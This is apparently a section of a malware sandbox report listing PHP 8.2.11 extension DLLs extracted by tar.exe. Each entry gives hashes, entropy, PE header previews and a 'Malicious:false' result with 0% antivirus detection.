                                              MD5:5CC5D033FCF7016A8C7DD57CF6BBE2E6
                                              SHA1:FDFCE1E25777F150AB0336D41AE090F42807A7E8
                                              SHA-256:3E49BC0507E3A961E25F546E371CDF8FD677A2A26CAE6039486584D426A32E94
                                              SHA-512:51E1414ED4AC6B28307E5090DABEC0F92465F3F52DC789D9CD854779F8AC3B0E1D02576274461C26CA0846717E9088B2CCF82D4CEE5F4455C6C25C821F0014CE
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`...`...`....K..`......`...%..`......`......`......`......`..&....`...`..`..&....`..&....`..&.'..`..&....`..Rich.`..........PE..d......e.........." .........J......P........................................ .......S....`A............................................P...P...........0.......,......................T...........................0...8............................................text.............................. ..`.rdata...%.......&..................@..@.data...............................@....pdata..,...........................@..@.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):327680
                                              Entropy (8bit):6.367489539582219
                                              Encrypted:false
                                              SSDEEP:6144:ItZaWYCcRxoJNpL/5mLC9S3Sj17JDtTyXb9QgfuitgyHM4i:GpRpB79QSj17JDtgb2YUx
                                              MD5:70BB8D5E44E5B2C42FCF42AF9C9C1C0C
                                              SHA1:1EC6DEE29D8E89857258C02528FA446AFB31A150
                                              SHA-256:7C2341D2BAE0AB90AB98C72E1BAED382AADF8E740EB746F71DB9B7A6AA757FA4
                                              SHA-512:86F8ADEA1469990BC0F0CC33BE3D5CF0F9A61576BC09E1246E464D90B0ADC2E8D225D9FCF5301E593E5EBFF0977F543FECAFA6CF988F2B18B086B5E3525EC8D8
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.m....................].......].......].......].......D.......{..................i...................................Rich....................PE..d...H..e.........." ................. .......................................@............`A........................................ ...h............ ..<........!...........0.........T.......................(...0...8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...............................@....pdata...!......."..................@..@.rsrc...<.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):963584
                                              Entropy (8bit):6.723321011310448
                                              Encrypted:false
                                              SSDEEP:24576:kZxUoo7wKFZRGZf8x/phdNTEC5fjznDB3PB:MQFXG+9nnDB
                                              MD5:1DC83B23E1EA974971DAD8B9E8C42B3B
                                              SHA1:D37875758E83EAC0592E2B3A26B4C8CC61C5DEEC
                                              SHA-256:BF49A5D779EE34569C025FB54BBFA55FFA11B7019FAB62E6B2A23F459E4B5A31
                                              SHA-512:26787B10D74201706C5510C3659DAD88D48691CB45E71ADDBE651C1118C006B4CE6BAAD0CF62B0B0160A293BDBB7991376419BF93E8DE3C579A7B1EE901E40FC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........B...#.I.#.I.#.I.[.I.#.I.V.H.#.I.L~I.#.I.V.H.#.I.V.H.#.I.V.H.#.I.[.H.#.I(V.H.#.I[V.H.#.I.#.I.".I[V.H.#.I[V.H.#.I[V|I.#.I[V.H.#.IRich.#.I........................PE..d...s..e.........." ................0.....................................................`A............................................L...,...........$.......`K..................`r..T....................t..(....r..8...............p............................text............................... ..`.rdata..`G.......H..................@..@.data....z.......b..................@....pdata..`K.......L...R..............@..@.rsrc...$...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):434176
                                              Entropy (8bit):6.134565062879546
                                              Encrypted:false
                                              SSDEEP:6144:AXmUw3mVDlD8/f/slfILcfyyJaYckBOTJf4em/XOeNVzBf7+OyaFzT+vUE2K/igv:SKZov1OFCOW2igOG0g4ZJFCZVFgqH7H
                                              MD5:BF0854F48B5390CD6327D712ECE11679
                                              SHA1:329885FEE117FE4F415B44CE0A48C3B76BEDA776
                                              SHA-256:6F212D576C12F9B82B03A8733139BCBB9FA34CE7C2C0C5934B8D6DBF477C0B87
                                              SHA-512:9F367A109670FCA9B7C7E2F9ED72D057E4196D27693AAC52436861E89273DEC7CE46DA9F43709D0FA21668F017EB0B8176844E76D29A69C6624FD0C6DA52CD4D
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................?............................^.....W.......R..W......W.....W.S...W.....Rich...........PE..d......e.........." .................!...............................................X....`A............................................L...L...@...............................|...($..T....................&..(....$..8...............`............................text............................... ..`.rdata..np.......r..................@..@.data................^..............@....pdata...............d..............@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):260096
                                              Entropy (8bit):6.199963974332617
                                              Encrypted:false
                                              SSDEEP:6144:Zv8nThV3NO4fFWVsGDxAPl0l97vc01wsi:ZshxNOUW+e401i
                                              MD5:EFA57BC83A2649D790AAE66B36BE995D
                                              SHA1:260F8BF96A6E0DC88DE4A31E2EBD5739756ADC10
                                              SHA-256:F138B0F697B2D5811FF025905585DCC9A0B8A7C99B2300B354D102ACC6864863
                                              SHA-512:6414F5D352DA24838C947824CA5BA2083133E4E67ED27F0865CD890C1533DBD81EDB5C1B8CE95CFB97B523034756E2DA01868782189A085A6F8B90DE7FD2B6A3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........=..n..n..n..9n..n..o..n..Wn..n..o..n..o..n..o..n..o..nX..o..nX..o..nZ..o..nQ..o..n..n..nQ..o..nQ..o..nQ.Un..nQ..o..nRich..n........PE..d......e.........." .........P..............................................@............`A........................................`...L.......,.... ...........(...........0.......x..T....................z..(....y..8............................................text.............................. ..`.rdata..............................@..@.data...,...........................@....pdata...(.......*..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):1591808
                                              Entropy (8bit):6.19554413646794
                                              Encrypted:false
                                              SSDEEP:24576:/9I4iLE633VhQb/coVtbmWVfAyAsiOJ0DZUUN4hgSoPjuUfNZZzPNm426b:lI4iLE6330bdtbHg2UN4HV4N/Pb2
                                              MD5:AA0FCF052F6F4CEE6321C7B6EF7605C7
                                              SHA1:CAAF86ACD873DF9618E223F78634E850AFE47000
                                              SHA-256:76DCDAAAC5774FB61373922A3013A4F523B7ED60E1A19D71DA6C5871747105FF
                                              SHA-512:2AB925D9EADD50C56B8EC9E6007760F271A8D7F7600C6D960B7C55E7B47AF4056DBAD05749AEBC66787EE750ACD02B48ED4E5EBF4681EF5C346EBDCD8025DA1B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h............q......|.......|.......|.......|.......q......8|.....M|.........(...M|.....M|......M|d....M|......Rich............................PE..d......e.........." .........<.......................................................+....`A........................................0....%...........P..........p2...........`..........T.......................(......8............ ..X............................text............................... ..`.rdata....... ......................@..@.data........ ......................@....pdata..p2.......4..................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):123904
                                              Entropy (8bit):5.804288310235706
                                              Encrypted:false
                                              SSDEEP:3072:WUqykXYrWC4U0WANy4YFmkyMFKxOf9YxDb6iZsD42wX9:WQkXYrj4U0jY4YFmk5KBNRN
                                              MD5:FFC7F8410634E4975B8F1C124356E1F0
                                              SHA1:011704A9393E88A63B133B7F3FE038876D0B897D
                                              SHA-256:10215580286DAF5F4DE6C6AA7BDB04FFC5E116CD28349BE28F0610AF142CCE7A
                                              SHA-512:8D7C6B81CD3DCADB8B684BAAFFA17C722225CDBA5447729B5F6131D07C08533896AEE45CADCD38521CC557DD9DB1A6655A97E1FAE44637BBDC1128EB2C192DA3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,kE.h.+Bh.+Bh.+Bar.Bn.+B:.*Cj.+B:..Cd.+B:./C`.+B:.(Ck.+B#r*Cj.+B..*Ck.+Bh.*B..+B..&Ca.+B..+Ci.+B...Bi.+B..)Ci.+BRichh.+B................PE..d......e.........." .................'....................................... ............`A............................................l...l........................................9..T....................;..(... :..8............0...............................text...Q........................... ..`.rdata.......0......................@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):157696
                                              Entropy (8bit):6.005613160335623
                                              Encrypted:false
                                              SSDEEP:3072:xj883Ey5iUKWc7oYrJhA8NrCsmTSjHJjDEO:xj880rUq8i+TCHJjB
                                              MD5:D9141908F62675273109741E7B7B2F54
                                              SHA1:50941410E1D70917C10C976BAF04977724564CBC
                                              SHA-256:1369CB4B93E19DC6EC57E0ABC8474A9626FC5AE593F4D024388919559C7DCA81
                                              SHA-512:3517DFFC5FE36253699213396742BAE04E98C5A21B9FE5934EFC8B7D2BB82FD3C177DD69C58D9E5EF7046583AFDD9A3F280CE138DCBC252FC229DC3544F27EFA
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|\..8=v.8=v.8=v.1E.2=v.jHw.:=v.^R..:=v.jHs.4=v.jHr.0=v.jHu.<=v.sEw.:=v..Lw.:=v..Hw.;=v.8=w..=v..H~.>=v..Hv.9=v..H..9=v..Ht.9=v.Rich8=v.........................PE..d...M..e.........." ...............................................................U+....`A.........................................7..P....8..........`....p..................0.......T...........................P ..8............................................text............................... ..`.rdata..<...........................@..@.data...<....`.......B..............@....pdata.......p.......D..............@..@.rsrc...`............T..............@..@.reloc..0............`..............@..B................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):67072
                                              Entropy (8bit):5.625050853058865
                                              Encrypted:false
                                              SSDEEP:768:3xiFvgirIbSZ8hRcP8dmFn0aQAm4S6B+rHs8AsX7gNWFFXUWy:hit+biH0MNSt7srQsWnEW
                                              MD5:2C24ACF353F8A8EC26C0A5807A39F47F
                                              SHA1:38BFB558E099D3F0C89A0DE59997A3768B94FD03
                                              SHA-256:4704C016A305F9B3D0D843E7FB742D80CFFB7901383F20AB0A5B7E616BED4A11
                                              SHA-512:37A8D3A5D47F40B90D4B33333CB7A61530EC7D75293A15E94FA43686E7AE2A3F93502EBD9270B4F66B8B1CC20EA83FE8859A9B2690B085A4B93BCF17A7CD4CF6
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.#.\lp.\lp.\lp.$.p.\lp.)mq.\lp.3.p.\lp.)iq.\lp.)hq.\lp.)oq.\lp.$mq.\lpD)mq.\lp.\mp.\lpD)dq.\lpD)lq.\lpD).p.\lpD)nq.\lpRich.\lp................PE..d...w..e.........." .........................................................@.......:....`A........................................ ...d............ ..........@............0...... ...T.......................(.......8............................................text.............................. ..`.rdata...^.......`..................@..@.data...............................@....pdata..@...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):848384
                                              Entropy (8bit):6.19605290151226
                                              Encrypted:false
                                              SSDEEP:24576:s/9JvlkQsvLoZYvNGHdrojJCPphbQQyHH6:s/PlkQsvLoZYvNGd7Qx
                                              MD5:AC26AB4F5763223C7D55A4400E62C2A0
                                              SHA1:7CDC897A2061D2145611BD2713837FCC28FC90FB
                                              SHA-256:AA04550C629C6501C6E09942E0532025A4E79459299D81B7D93EE792FA8AEED0
                                              SHA-512:E98B304DA212C7A7EFC6654229D6D5F168D308153914A7262819CB4663D578A342B01D1EA3222DA2FD34037BB75BEE795E2883B6FB0296F9F5AF1CC7C9B58A02
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:...~...~...~...w.b.n...,...|.......x...,...s...,...v...,...z...5...z......}...~..........s........................Rich~...........PE..d......e.........." ........................................................@......?.....`A........................................PK......PM...................#........... .. ...$5..T....................:..(....5..8............ ..@............................text............................... ..`.rdata...^... ...`..................@..@.data....S.......@...p..............@....pdata...#.......$..................@..@.rsrc...............................@..@.reloc.. .... ......................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):150528
                                              Entropy (8bit):6.093628718417149
                                              Encrypted:false
                                              SSDEEP:3072:D40LmOkosYGniz4wQ689pyqsau3y2JxrCOljSMzpuixnILGDOdnv3IwUE8T:hLLsYG8Q6ipyqsau3y2J9COljhzpuix7
                                              MD5:53CEA3100D66E25E1A0D487DB01C6EF1
                                              SHA1:9570A707736E622712CB05E2B81D018EB3FF4E9E
                                              SHA-256:92E2E4E7CD0AF40B5C5CABBED82CDD163377AAA25A3855FD2229F014A54B52EE
                                              SHA-512:EAC14A09A4135AE4A3B881E399FDB32A0431B6282FD2D6759A8D07998A2535FD8A12F57A98954DC8AD30E3C93978ACD4127115D66749361B65E3018A815519C3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].x..g...g...g.......g..K....g.......g..K....g..K....g..K....g..R....g.......g.......g...g..,e.......g.......g.......g.......g..Rich.g..................PE..d......e.........." .....X..........`.....................................................`A....................................................@............p..P...............P...X...T...............................8............p...............................text....W.......X.................. ..`.rdata..*....p.......\..............@..@.data........P......................@....pdata..P....p.......0..............@..@.rsrc................<..............@..@.reloc..P............F..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):5.692000280117777
                                              Encrypted:false
                                              SSDEEP:384:0D/Cy7KLjoSM0RpqGIy6YDoRe8FBl1aFrBrlGQU6evs2ViO4EpQlZcEdNNS74kfu:sKUS9pDIN/QxOPvRViO4EpWZ1NNS7T
                                              MD5:42CFCC2A50EF8A696D29240289230B71
                                              SHA1:65AB7027FA25B326A2A823A42A16FE47256BBEB0
                                              SHA-256:8F40D805F00E056C3C66CF60026ECED566869A46A5097B9BC1281D08ED774FAE
                                              SHA-512:CB26C731481C1FDBA2427B90816FEBAC70DFA712180055865C64107CA12339270ADEE20C517D43BD5BAFF13D9392F76A310A7C944CB079AA44E9677A00E7E03B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`M..$,.Z$,.Z$,.Z-TtZ.,.ZvY.[&,.ZvY.[(,.ZvY.[,,.ZvY.[',.ZoT.[&,.ZKZ{Z&,.Z.Y.[',.Z$,.Z_,.Z.Y.[',.Z.Y.[%,.Z.Y.Z%,.Z.Y.[%,.ZRich$,.Z........................PE..d......e.........." .....D...8.......I....................................................`A.........................................u..T...$v..........l.......P...............p...pk..T............................k..8............`...............................text...XC.......D.................. ..`.rdata..."...`...$...H..............@..@.data................l..............@....pdata..P............n..............@..@.rsrc...l............t..............@..@.reloc..p............~..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):30720
                                              Entropy (8bit):5.651889546705484
                                              Encrypted:false
                                              SSDEEP:384:hPXts6TMtnYFy29KWF9lCwvK8D7VtPIty/LXoZD8fqgoNhpQSDyLkfuA3:R+L+9Sw7UoqBhpQ4ya/
                                              MD5:01F30236EE1D63C1D820AEEF0D65E537
                                              SHA1:277052E4304B9763D08DFE66949CD4E96A8F6CE1
                                              SHA-256:3DD66594E0A9FFB825E7294E3B873CA055308EA8322ABFD89E1D3F87348D4F0D
                                              SHA-512:6BB153FE6A915DDCCAABCB5643326F583B6D39C1816396D41B3CFAECE2D84BD3AC8F2F4D5D112D90173D18D6B8D79567077AF54C707A953EFE822A78542BA62E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P..............c.............................................V..............V.......V.......V.......V.......Rich............PE..d...1..e.........." .....<...8......`...............................................k.....`A.........................................f..P...@g.................. ....................T..T...........................`T..8............P...............................text...C;.......<.................. ..`.rdata..:"...P...$...@..............@..@.data................d..............@....pdata.. ............f..............@..@.rsrc................l..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):36864
                                              Entropy (8bit):5.812782572044853
                                              Encrypted:false
                                              SSDEEP:384:rJ6VSeIvZdq5ApI0zopshLND3s81eaWpa0+Lg70uwajN1L8QVgrNsQTYkfuT:uyI0zY+NTUuUQuDfL8Qmhsyz
                                              MD5:9214F0BC32185686EFA74CFB7DD77A5F
                                              SHA1:A6C80AC35CA56DF7BFF4532DCDD7212D27E9CB1B
                                              SHA-256:CB8FD230038D4246C9E502994142FD4BB63043F531B8F53840114A4DCA1774FD
                                              SHA-512:75DB6B54AC3A1994735AF9F9E129B019A54ACD00B0C8469DB83A4F1F85D69F08DB1C385ACF771B5AC52B5B4DC98A67E102424CB6B6910F89ED9CEBAEC966B817
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Rm.\.............ty.....Dy......Dy......Dy......Dy......]t.......}.......y..........o....y.......y.......y.......y......Rich............PE..d...Z..e.........." .....P...<.......S....................................................`A........................................Py..P....y..........T...........................`p..T............................p..8............`...............................text...hO.......P.................. ..`.rdata...'...`...(...T..............@..@.data................|..............@....pdata...............~..............@..@.rsrc...T...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):29696
                                              Entropy (8bit):5.694057398919337
                                              Encrypted:false
                                              SSDEEP:384:EvXJb3TslcxAeK3naAxv3BFOJD8WRNuWuV3bDkfu:Ev5HOHeK3dsJD8quW+y
                                              MD5:62CB2CD0BCB38140AADAB3B0FD733D76
                                              SHA1:AF276B2F33DCD5A4B4A09CF40C4CA558F73476A7
                                              SHA-256:25133040AF508CFA510BA19359CB17E40D213233FE569F54B568D668F8527F07
                                              SHA-512:2F80CF35D67547854F29B983D6D0BD4E2C9BF88F65C627690821814B933CA6A55FE9B5135ECFB8E3F35975108A4A1A1F19BD3C4BAC86A632969998C6455D10B6
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n].\*<..*<..*<..#DI.,<..xI..(<..xI..!<..xI.."<..xI..)<..aD...<...I..)<..*<..Y<...I..)<...I..+<...I%.+<...I..+<..Rich*<..........................PE..d......e.........." .....:...6.......>..............................................'.....`A.........................................e..P...0f..........L.......P...............p....[..T...........................P\..8............P...............................text....9.......:.................. ..`.rdata..~!...P..."...>..............@..@.data................`..............@....pdata..P............b..............@..@.rsrc...L............h..............@..@.reloc..p............r..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):44544
                                              Entropy (8bit):5.833228183570426
                                              Encrypted:false
                                              SSDEEP:768:4HAPw5VD/+wzv3iXJM0Yrso1ndY2c8NuAFEve3:Qn5V7FmXJM2kyUudm3
                                              MD5:DD7EACA3BACBE66E5C400C6208816900
                                              SHA1:02FB4502F505DFED23FEA161BE8CF53C21848615
                                              SHA-256:89A3795A4DDF885B0EC4C4A163D7F453F4524335C298F84A0C8A9C724A5D04DD
                                              SHA-512:131310BE70A68CB4598836DEC9A6A55CB4554498F569D32E2AC0D86F99E8175CD87351E913A0747DD7CDC897D16EDE87D86F165151AFFF5AC13640DD39FBE1DC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9z..9z..9z..A..9z..L{..9z..L...9z..L~..9z..Ly..9z..A{..9z.'L{..9z..L{..9z..9{.{9z..Lr..9z..Lz..9z..L...9z..Lx..9z.Rich.9z.................PE..d......e.........." .....b...H......`f....................................................`A............................................P..........................................4...T...............................8............................................text....a.......b.................. ..`.rdata...2.......4...f..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):29184
                                              Entropy (8bit):5.617682334230002
                                              Encrypted:false
                                              SSDEEP:384:Bcm5XRd+NrXQTtVXl60hbkYGscnzoYYjjH+wMyO12A0jlPeDQsHkfu/m:dRdXTV7xO4H+wMR05PlsG
                                              MD5:3AA11C06497DAD669A36C95997D11949
                                              SHA1:E508276AD6480469FDE12C7B3934EA333EE40113
                                              SHA-256:E88E3A64B81BBB4AE69A20D089D9CACBD94F7006A0336AF342E0A07BE8AA83A0
                                              SHA-512:C6310923708D2D570166190C09B091108C480C79C07EBC12E81EF09667B8732B625FFB1CD0F5239D27FB5D3039B0F29C53FA4D1DA99A00CBAF8D642D0C510AE3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o.G.o.G.o.G..eG.o.G...F.o.G...F.o.G...F.o.G...F.o.G...F.o.Gd..F.o.Gn..F.o.G.o.G(o.Gn..F.o.Gn..F.o.Gn..G.o.Gn..F.o.GRich.o.G........PE..d......e.........." .....4...:......P...............................................Eu....`A........................................Pe..P....e..........`............................U..T...........................0V..8............P..X............................text....3.......4.................. ..`.rdata...&...P...(...8..............@..@.data................`..............@....pdata...............b..............@..@.rsrc...`............f..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):102400
                                              Entropy (8bit):5.9506957928660915
                                              Encrypted:false
                                              SSDEEP:3072:snGni66grdjHhNL74raXG6dpxTBH7dW+mQr:eGi66ghHhZXDdpxTBHhWH4
                                              MD5:5DF599A67BD246883BE13356884F52DB
                                              SHA1:36F784025B3DAA10ED08157F288145A556C4984A
                                              SHA-256:64D49048697FAEDB7DB50C7847E82E2FD73690715B97F086006F4653366852CF
                                              SHA-512:5B59017F206B29A5AAC606B9265F72D28666B818BC3C4FED94587AAE8B9E59A42B3C3C52CF1DB8B2E6F9F33016514AD157B0381A9D73DED3FE8144093C5C7628
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j..............sR......~.......~......~......~......s......[~......R~..........`...R~.....R~......R~>.....R~.....Rich............................PE..d......e.........." ................ ...............................................8a....`A.........................................t......$u..................,...............X.......T.......................(...@...8............................................text............................... ..`.rdata..............................@..@.data................v..............@....pdata..,............x..............@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):17920
                                              Entropy (8bit):5.096654198011819
                                              Encrypted:false
                                              SSDEEP:192:5p3ipVsaKgNytM+ZRmnMql7ABjoAq5OCY5UK206KPyamDhcqKfJQ8okfui:5diYRAPaBQ5iMYODHK/okfui
                                              MD5:E61AB7AF8F8B4296DEE7EA646736246B
                                              SHA1:9CA2F83A438756748F48B2D2E71E78A1ED49CF82
                                              SHA-256:65777F661200A533F723CA7F09B2CE26CD50F8A3EEF13C928D9682B664B9AF3B
                                              SHA-512:6E44D8353CF87CB8F159F6B4758C83AEE63AB13C4D7ECFD3C47D481768C8654D194BC0BEAE4096C48D119CF6FCB6E0937F07C0E447C7242D0A59A95C6699A74E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.......................................................................................................Rich....................PE..d...3..e.........." .........*...... ...............................................X.....`A........................................`@..L....@..d....p..t....`.......................8..T...........................P9..8............0...............................text...X........................... ..`.rdata..l....0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc...t....p.......:..............@..@.reloc...............D..............@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):429056
                                              Entropy (8bit):6.328602363733681
                                              Encrypted:false
                                              SSDEEP:12288:wNxyH1SlykmFB59Jqenl7iG+lMIxl/zZP:2xmIlyz59JqenlMlMml/z1
                                              MD5:D61E65180C31BC58EBFA02EFC9747CB5
                                              SHA1:1A3F88957EF6F1B1B271ACFA620BC25CF23E9322
                                              SHA-256:A4761A1429FDC1154F6F5A23870D6646872F76A41922E02A3199008D2462A89F
                                              SHA-512:7B39AE1F52334DFFFEA03AFF78797A8BB4E51711323F3C0D64F1D4F272853990344B040E3D5818CB3DC500ACE273EB7C00A9B6B3F5933FBC27A21FB1FD5E0064
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
